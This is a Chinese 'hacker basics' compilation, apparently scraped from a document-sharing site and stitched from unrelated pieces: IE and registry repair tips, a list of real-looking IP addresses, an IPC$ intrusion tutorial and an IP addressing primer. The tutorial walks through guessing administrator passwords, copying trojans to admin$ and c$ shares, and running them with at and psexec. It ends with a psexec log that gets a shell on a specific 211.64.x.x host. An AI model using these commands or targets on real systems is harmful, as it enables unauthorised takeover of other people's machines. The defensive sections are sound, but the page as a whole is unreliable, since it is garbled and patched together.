最后的爱情歌词:黑客基础知识大全2

来源:百度文库 编辑:偶看新闻 时间:2024/04/28 11:45:48

【IE与注册表解决方法】一、IE标题栏被修改 请打开你的注册表工具(在运行菜单中输入regedit,不能用regedit者见后) 查找: 
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 这两个地方,将其中的Windows Title主键删除 然后重新启动你的IE 
二、首页被修改(Homepage) 这个是最简单的,在IE的设置中就可以改回来 
三、在windows启动时弹出一个窗口,点确定才能进去 在注册表中查找: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon 删除其中的LegalNoticeCaption和LegalNoticeText主键 
四、IE中点击鼠标右键菜单中插入的广告 在注册表中查找 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt 找到相关的条目删除即可 
五、综合解决 可建立一个.reg的文件,其内容如下: REGEDIT4 [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main] "Window Title"="Microsoft Internet Explorer" "Start Page"="about:blank" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Window Title"="Microsoft Internet Explorer" [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="" "LegalNoticeText"="" 
当你发现前三项被修改时,执行一次这个.reg后缀的文件就可以了 
六、当你的主页被修改而且关于主页的三个按钮“使用当前页”、 “使用默认页”、“使用空白页”也变成灰色,不能修改。 建立一个.reg文件,内容如下: REGEDIT4 
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel] "HomePage"=dword:00000000 
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Start Page"="about:blank" "Window Title"="Microsoft Internet Explorer" 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] "Start Page"="about:blank" "Window Title"="Microsoft Internet Explorer" 
然后保存并双击导入即可 
七、注册表被禁用 那您真是背到家了,呵呵 把这段内容保存成.reg结尾的文件,双击执行吧 REGEDIT4 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 
"DisableRegistryTools"=dword:00000000 
八、不懂注册表为何物? 请到www.coolstarpage.com/unreg去恢复吧 或者使用magicset或者到 http://www.soft999.com/download1/IESetup.exe 下载ie反修改精灵 
九、Windows2000用户的防范 请打开管理工具/服务,禁用Remote Registry Service服务,使他人无法修改你的 注册表内容 
十、终极办法! 将你的IE升级到IE5.5 sp2或者IE6 将你的W2k升级到sp2 您将不会遇到这类问题 当然最好你再装上专门的防毒或者防火墙软件 或者再把你的IE安全设置中脚本执行设置为提示 

【ip】211.64.192.235211.64.192.69211.64.206.17211.64.206.213211.64.192.191211.64.207.144211.64.192.252211.64.201.147211.64.207.101211.64.199.40211.64.199.119211.64.207.43211.64.194.35211.64.201.222211.64.193.137211.64.194.116211.64.194.54211.64.201.35211.64.201.10211.64.194.99211.64.206.213211.64.207.43
【ipc$共享入侵】ipc$共享入侵 
微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。反而成了黑客入侵nt架构操作系统的一条便利通道。如果你的操作系统存在不安全的口令,那就更可怕了。一条典型的入侵流程如下: 
(1)用任何办法得到一个帐户与口令(猜测,破解),网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。如果你的密码位数不高,又很简单,是很容易被破解的。根据我的个人经验,相当多的人都将administrator的口令设为123,2003,或者干脆不设密码。 
(2)使用命令net use \\xxx.xxx.xxx.xxx\ipc$“密码” /user:“用户名”建立一个有一定权限的ipc$连接。用copy trojan.exe \\xxx.xxx.xxx.xxx\admin$ 将木马程序的服务器端复制到系统目录下。
(3)用net time \\xxx.xxx.xxx.xxx 命令查看对方操作系统的时间,然后用at \\202.xxx.xxx.xxx 12:00 trojan.exe 让trojan.exe在指定时间运行。 
这样一来,你的电脑就完全被黑客控制了。 
应对措施:禁用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾(插入图1), 
当然,给自己的帐户加上强壮的口令才是最关键的。 


【IPC$命令】IPC$命令一 摘要二 什么是ipc$三 什么是空会话四 空会话可以做什么五 ipc$所使用的端口六 ipc管道在hack攻击中的意义七 ipc$连接失败的常见原因八 复制文件失败的原因九 关于at命令和xp对ipc$的限制十 如何打开目标的IPC$共享以及其他共享十一 一些需要shell才能完成的命令十二 入侵中可能会用到的命令十三 对比过去和现今的ipc$入侵十四 如何防范ipc$入侵十五 ipc$入侵问答精选
一 摘要注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列。

二 什么是ipc$IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?

三 什么是空会话在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下: 1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建 立; 2)服务器产生一个随机的64位数(实现挑战)传送回客户; 3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结 果返回到服务器(实现响应); 4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。以上是一个安全会话建立的大致过程,那么空会话又如何呢?
空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组: Everyone Network在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢? 

四 空会话可以做什么 对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的,成功的导出用户列表大大增加了猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令:

1 首先,我们先建立一个空连接(当然,这需要目标开放ipc$)命令:net use \\ip\ipc$ "" /user:""注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。

2 查看远程主机的共享资源命令:net view \\ip解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。
在 \\*.*.*.*的共享资源资源共享名 类型 用途 注释
-----------------------------------------------------------NETLOGON Disk Logon server shareSYSVOL Disk Logon server share命令成功完成。
3 查看远程主机的当前时间命令: net time \\ip解释:用此命令可以得到一个远程主机的当前时间。

4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)命令:nbtstat -A ip用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status---------------------------------------------SERVER <00> UNIQUE RegisteredOYAMANISHI-H <00> GROUP RegisteredOYAMANISHI-H <1C> GROUP RegisteredSERVER <20> UNIQUE RegisteredOYAMANISHI-H <1B> UNIQUE RegisteredOYAMANISHI-H <1E> GROUP RegisteredSERVER <03> UNIQUE RegisteredOYAMANISHI-H <1D> UNIQUE Registered..__MSBROWSE__.<01> GROUP RegisteredINet~Services <1C> GROUP RegisteredIS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在Event Log中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?

五 ipc$所使用的端口首先我们来了解一些基础知识:1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。3 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。
有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:
对于win2000客户端(发起端)来说:1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。

对于win2000服务器端来说:1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);2 如果禁止NBT,那么只有445端口开放。

我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。

六 ipc管道在hack攻击中的意义ipc管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放ipc管道的主机似乎更容易得手。通过ipc管道,我们可以远程调用一些系统函数(大多通过工具实现,但需要相应的权限),这往往是入侵成败的关键。如果不考虑这些,仅从传送文件这一方面,ipc管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然,我们也不能忽视权限在ipc管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限,那么ipc管道这把双刃剑将显示出它狰狞的一面。

七 ipc$连接失败的常见原因以下是一些常见的导致ipc$连接失败的原因:
1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;

2 如果想成功的建立一个ipc$连接,就需要响应方开启ipc$共享,即使是空连接也是这样,如果响应方关闭了ipc$共享,将不能建立连接;

3 连接发起方未启动Lanmanworkstation服务(显示名为:Workstation):它提供网络链结和通讯,没有它发起方无法发起连接请求;

4 响应方未启动Lanmanserver服务(显示名为:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它主机将无法响应发起方的连接请求,不过没有它仍可发起ipc$连接;

5 响应方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份(不过这种情况好像不多);

6 响应方的139,445端口未处于监听状态或被防火墙屏蔽;

7 连接发起方未打开139,445端口;

8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于'无法更新密码'这样的错误提示(显然空会话排除这种错误);

9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;

10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。 

另外,你也可以根据返回的错误号分析原因: 
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的; 错误号51,Windows无法找到网络路径:网络有问题; 错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连; 错误号1326,未知的用户名或错误密码:原因很明显了; 错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。 

八 复制文件失败的原因有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?

1 对方未开启共享文件夹这类错误出现的最多,占到50%以上。许多朋友在ipc$连接建立成功后,甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下你想要复制的共享文件夹是否存在(用软件查看当然更好),不要认为能建立ipc$连接就一定有共享文件夹存在。

2 向默认共享复制失败这类错误也是大家经常犯的,主要有两个小方面:
1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向c$,d$,admin$之类的默认共享复制文件,一旦对方未开启默认共享,将导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享,并不能说明默认共享一定存在。ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享却是实实在在的共享文件夹;
2)由于net view \\IP 这个命令无法显示默认共享文件夹(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)
要点:请大家一定区分ipc共享,默认共享,普通共享这三者的区别:ipc共享是一个管道,并不是实际的共享文件夹;默认共享是安装时默认打开的文件夹;普通共享是我们自己开启的可以设置权限的共享文件夹。

3用户权限不够,包括四种情形:1)空连接向所有共享(默认共享和普通共享)复制时,权限是不够的;2)向默认共享复制时,在Win2000 Pro版中,只有Administrators和Backup Operators组成员才可以,在Win2000 Server版本 Server Operatros组也可以访问到这些共享目录; 3)向普通共享复制时,要具有相应权限(即对方管理员事先设定的访问权限);4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;
注意:1 不要认为administrator就一定具有管理员权限,管理员名称是可以改的2 管理员可以访问默认共享的文件夹,但不一定能够访问普通的共享文件夹,因为管理员可以对普通的共享文件夹进行访问权限设置,如图6,管理员为D盘设置的访问权限为仅允许名为xinxin的用户对该文件夹进行完全访问,那么此时即使你拥有管理员权限,你仍然不能访问D盘。不过有意思的是,如果此时对方又开启了D$的默认共享,那么你却可以访问D$,从而绕过了权限限制,有兴趣的朋友可以自己做测试。

4被防火墙杀死或在局域网还有一种情况,那就是也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;或者你把木马复制到了局域网内的主机,导致连接失败(反向连接的木马不会发生这种情况)。如果你没有想到这种情况,你会以为是复制上出了问题,但实际你的复制操作已经成功了,只是运行时出了问题。

呵呵,大家也知道,ipc$连接在实际操作过程中会出现各种各样的问题,上面我所总结的只是一些常见错误,没说到的,大家可以给我提个醒儿。

九 关于at命令和xp对ipc$的限制本来还想说一下用at远程运行程序失败的原因,但考虑到at的成功率不是很高,问题也很多,在这里就不提它了(提的越多,用的人就越多),而是推荐大家用psexec.exe远程运行程序,假设想要远程机器执行本地c:\xinxin.exe文件,且管理员为administrator,密码为1234,那么输入下面的命令:psexec \\ip -u administrator -p 1234 -c c:\xinxin.exe如果已经建立ipc连接,则-u -p这两个参数不需要,psexec.exe将自动拷贝文件到远程机器并运行。
本来xp中的ipc$也不想在这里讨论,想单独拿出来讨论,但看到越来越多的朋友很急切的提问为什么遇到xp的时候,大部分操作都很难成功。我在这里就简单提一下吧,在xp的默认安全选项中,任何远程访问仅被赋予来宾权限,也就是说即使你是用管理员帐户和密码,你所得到的权限也只是Guest,因此大部分操作都会因为权限不够而失败,而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密码,我建议你尽量避开ipc管道。

十 如何打开目标的IPC$共享以及其他共享目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马,cmd重定向等,然后在shell下执行:net share ipc$开放目标的ipc$共享;net share ipc$ /del关闭目标的ipc$共享;如果你要给它开共享文件夹,你可以用:net share xinxin=c:\这样就把它的c盘开为共享名为xinxin共享

【IPC$问答】1,怎样建立空连接,它有什么用? 答:使用命令 net use \\IP\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。 对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。如果你不理解“没用”的东西为什么还会存在,就看看“专业”的解释吧: 在NT/2000下的空连接 http://www.3389.net/bbs/dispbbs.asp?boardID=22&RootID=3424&ID=3424&page=1: 解剖WIN2K下的空会话 http://www.sandflee.net/txt/list.asp?id=117 ; 2,为什么我连不上IPC$? 答:1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。 2,确认你的命令没有打错。正确的命令是: net use \\目标IP\ipc$ "密码" /user:"用户名" 注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。 3,根据返回的错误号分析原因: 错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限; 错误号51,Windows 无法找到网络路径 : 网络有问题; 错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。 错误号1326,未知的用户名或错误密码 : 原因很明显了; 错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况) 错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。 4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,我在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。问题过于细致后就不适合在本文章里探讨了。 各位看着办吧,呵呵。 5,怎样打开目标的IPC$? 答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。 6,怎样映射和访问默认共享? 答:使用命令 net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。 如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \\IP\d$\path\muma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \\IP\d$ 。然后 copy muma.exe y:\path\muma.exe 。当路径中包含空格时,须用""将路径全引住。 7,如何删除映射和ipc$连接? 答:用命令 net use \\IP\ipc$ /del 删除和一个目标的ipc$连接。 用命令 net use z: /del 删除映射的z盘,其他盘类推。 用命令 net use * /del 删除全部。会有提示要求按y确认。 8,连上ipc$然后我能做什么? 答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。 9,怎样防止别人用ips$和默认共享入侵我? 答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。 1,先把已有的删除 net share ipc$ /del net share admin$ /del net share c$ /del …………(有几个删几个) 2,禁止别人空连接   首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous(DWORD)的键值改为:00000002。   3,禁止自动打开默认共享   对于server版,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。 对于pro版,则是[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。 如果上面所说的主键不存在,就新建一个再改键值。 B、另一种是关闭ipc$和默认共享依赖的服务(不推荐) net stop lanmanserver 可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。 C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。 D、还有一个办法就是装防火墙,或者端口过滤
【IP地址从头说起】                          IP地址从头说起 

随着电脑技术的逐步普及和因特网技术的迅猛发展,学习因特网、利用因特网已不再是那些腰缠万贯的大款和戴者深度眼睛的专业技术人员的专利,它已作为二十一世纪人类的一种新的生活方式而逐步深入到寻常百姓家。谈到因特网,IP地址就不能不提,因为无论是从学习还是使用因特网的角度来看,IP地址都是一个十分重要的概念,INTERNET的许多服务和特点都是通过IP地址体现出来的。 
一、IP地址的概念     我们知道因特网是全世界范围内的计算机联为一体而构成的通信网络的总称。联在某个网络上的两台计算机之间在相互通信时,在它们所传送的数据包里都会含有某些附加信息,这些附加信息就是发送数据的计算机的地址和接受数据的计算机的地址。象这样,人们为了通信的方便给每一台计算机都事先分配一个类似我们日常生活中的电话号码一样的标识地址,该标识地址就是我们今天所要介绍的IP地址。根据TCP/IP协议规定,IP地址是由32位二进制数组成,而且在INTERNET范围内是唯一的。例如,某台联在因特网上的计算机的IP地址为: 
11010010 01001001 10001100 00000010 
很明显,这些数字对于人来说不太好记忆。人们为了方便记忆,就将组成计算机的IP地址的32位二进制分成四段,每段8位,中间用小数点隔开,然后将每八位二进制转换成十进制数,这样上述计算机的IP地址就变成了:210.73.140.2。 
二、IP地址的分类     我们说过因特网是把全世界的无数个网络连接起来的一个庞大的网间网,每个网络中的计算机通过其自身的IP地址而被唯一标识的,据此我们也可以设想,在INTERNET上这个庞大的网间网中,每个网络也有自己的标识符。这与我们日常生活中的电话号码很相像,例如有一个电话号码为0515163,这个号码中的前四位表示该电话是属于哪个地区的,后面的数字表示该地区的某个电话号码。与上面的例子类似,我们把计算机的IP地址也分成两部分,分别为网络标识和主机标识。同一个物理网络上的所有主机都用同一个网络标识,网络上的一个主机(包括网络上工作站、服务器和路由器等)都有一个主机标识与其对应?IP地址的4个字节划分为2个部分,一部分用以标明具体的网络段,即网络标识;另一部分用以标明具体的节点,即主机标识,也就是说某个网络中的特定的计算机号码。例如,盐城市信息网络中心的服务器的IP地址为210.73.140.2,对于该IP地址,我们可以把它分成网络标识和主机标识两部分,这样上述的IP地址就可以写成: 
网络标识:210.73.140.0 
主机标识:     2         
合起来写:210.73.140.2 
由于网络中包含的计算机有可能不一样多,有的网络可能含有较多的计算机,也有的网络包含较少的计算机,于是人们按照网络规模的大小,把32位地址信息设成三种定位的划分方式,这三种划分方法分别对应于A类、B类、C类IP地址。 

1.A类IP地址 
  一个A类IP地址是指,在IP地址的四段号码中,第一段号码为网络号码,剩下的三段号码为本地计算机的号码。如果用二进制表示IP地址的话,A类IP地址就由1字节的网络地址和3字节主机地址组成,网络地址的最高位必须是“0”。A类IP地址中网络的标识长度为7位,主机标识的长度为24位,A类网络地址数量较少,可以用于主机数达1600多万台的大型网络。 

2.B类IP地址 
  一个B类IP地址是指,在IP地址的四段号码中,前两段号码为网络号码,B类IP地址就由2字节的网络地址和2字节主机地址组成,网络地址的最高位必须是“10”。B类IP地址中网络的标识长度为14位,主机标识的长度为16位,B类网络地址适用于中等规模规模的网络,每个网络所能容纳的计算机数为6万多台。 

3.C类IP地址 
  一个C类IP地址是指,在IP地址的四段号码中,前三段号码为网络号码,剩下的一段号码为本地计算机的号码。如果用二进制表示IP地址的话,C类IP地址就由3字节的网络地址和1字节主机地址组成,网络地址的最高位必须是“110”。C类IP地址中网络的标识长度为21位,主机标识的长度为8位,C类网络地址数量较多,适用于小规模的局域网络,每个网络最多只能包含254台计算机。 
  除了上面三种类型的IP地址外,还有几种特殊类型的IP地址,TCP/IP协议规定,凡IP地址中的第一个字节以“lll0”开始的地址都叫多点广播地址。因此,任何第一个字节大于223小于240的IP地址是多点广播地址;IP地址中的每一个字节都为0的地址(“0.0.0.0”)对应于当前主机;IP地址中的每一个字节都为1的IP地址(“255.255.255.255”)是当前子网的广播地址;IP地址中凡是以“llll0”的地址都留着将来作为特殊用途使用;IP地址中不能以十进制“127”作为开头,27.1.1.1用于回路测试,同时网络ID的第一个6位组也不能全置为“0”,全“0”表示本地网络。 
三、IP的寻址规则      1.网络寻址规则 
   A、 网络地址必须唯一。 
   B、 网络标识不能以数字127开头。在A类地址中,数字127保留给内部回送函数。 
   C、 网络标识的第一个字节不能为255。数字255作为广播地址。 
   D、 网络标识的第一个字节不能为“0”,“0”表示该地址是本地主机,不能传送。 
   2.主机寻址规则 
   A、主机标识在同一网络内必须是唯一的。 
   B、主机标识的各个位不能都为“1”,如果所有位都为“1”,则该机地址是广播地址,而非主机的地址。 
   C、主机标识的各个位不能都为“0”,如果各个位都为“0”,则表示“只有这个网络”,而这个网络上没有任何主机。 
四、IP子网掩码概述      
1.子网掩码的概念 
  子网掩码是一个32位地址,用于屏蔽IP地址的一部分以区别网络标识和主机标识,并说明该IP地址是在局域网上,还是在远程网上。 

2.确定子网掩码数 
  用于子网掩码的位数决定于可能的子网数目和每个子网的主机数目。在定义子网掩码前,必须弄清楚本来使用的子网数和主机数目。 
  定义子网掩码的步骤为: 
  A、确定哪些组地址归我们使用。比如我们申请到的网络号为 “210.73.a.b”,该网络地址为c类IP地址,网络标识为“210.73”,主机标识为“a.b”。 
  B、根据我们现在所需的子网数以及将来可能扩充到的子网数,用宿主机的一些位来定义子网掩码。比如我们现在需要12个子网,将来可能需要16个。用第三个字节的前四位确定子网掩码。前四位都置为“1”,即第三个字节为“11110000”,这个数我们暂且称作新的二进制子网掩码。 
  C、把对应初始网络的各个位都置为“1”,即前两个字节都置为“1”,第四个字节都置为“0”,则子网掩码的间断二进制形式为:“11111111.11111111.11110000.00000000” 
  D、把这个数转化为间断十进制形式为:“255.255.240.0” 
这个数为该网络的子网掩码。 

3.IP掩码的标注 
  A、无子网的标注法 
  对无子网的IP地址,可写成主机号为0的掩码。如IP地址210.73.140.5,掩码为255.255.255.0,也可以缺省掩码,只写IP地址。 
  B、有子网的标注法 
  有子网时,一定要二者配对出现。以C类地址为例。 
  1.IP地址中的前3个字节表示网络号,后一个字节既表明子网号,又说明主机号,还说明两个IP地址是否属于一个网段。如果属于同一网络区间,这两个地址间的信息交换就不通过路由器。如果不属同一网络区间,也就是子网号不同,两个地址的信息交换就要通过路由器进行。例如:对于IP地址为210.73.140.5的主机来说,其主机标识为00000101,对于IP地址为210.73.140.16的主机来说它的主机标识为00010000,以上两个主机标识的前面三位全是000,说明这两个IP地址在同一个网络区域中,这两台主机在交换信息时不需要通过路由器进行10.73.60.1的主机标识为00000001,210.73.60.252的主机标识为11111100,这两个主机标识的前面三位000与011不同,说明二者在不同的网络区域,要交换信息需要通过路由器。其子网上主机号各为1和252。 
  2.掩码的功用是说明有子网和有几个子网,但子网数只能表示为一个范围,不能确切讲具体几个子网,掩码不说明具体子网号,有子网的掩码格式(对C类地址): 
五、IP的其他事项     1.一般国际互联网信息中心在分配IP地址时是按照网络来分配的,因此只有说到网络地址时才能使用A类、B类、C类的说法; 
  2.在分配网络地址时,网络标识是固定的,而计算机标识是可以在一定范围内变化的,下面是三类网络地址的组成形式: 
A类地址:73.0.0.0 
B类地址:160.153.0.0 
C类地址:210.73.140.0 
上述中的每个0均可以在0~255之间进行变化。 
  3.因为IP地址的前三位数字已决定了一个IP地址是属于何种类型的网络,所以A类网络地址将无法再分成B类IP地址,B类IP地址也不能再分成C类IP地址。 
  4.在谈到某一特定的计算机IP地址时不宜使用A类、B类、C类的说法,但可以说主机地址是属于哪一个A类、B类、C类网络了。 
  通过上面的学习,大家对IP地址肯定有了了解。有了IP地址大家就可以发送电子邮件了,并且可以获得Internet网上的其他信息,例如可以获得Internet上的WWW服务、BBS服务、FTP服务等等。 



【minglin】The specified application is not on the path.

G:\1>psexec \\远程机器ip -u abc -p 123 cmd

G:\1>psexec \\远程机器ip -u abc -p 123 -c c:\tftp32.exe -d
G:\1>psexec \\远程机器ip -u abc -p 123 cmd



Make sure that the default admin$ share is enabled on 远程机器ip.
G:\1>psexec \\211.64.201.77 -u administrator cmd
PsExec v1.56 - Execute processes remotelyCopyright (C) 2001-2004 Mark RussinovichSysinternals - www.sysinternals.com
Password:
Microsoft Windows 2000 [Version 5.00.2195](C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>dir /p 驱动器 C 中的卷没有标签。 卷的序列号是 1C81-914F
 
G:\1>psexec \\211.64.201.77 -u administrator cmd
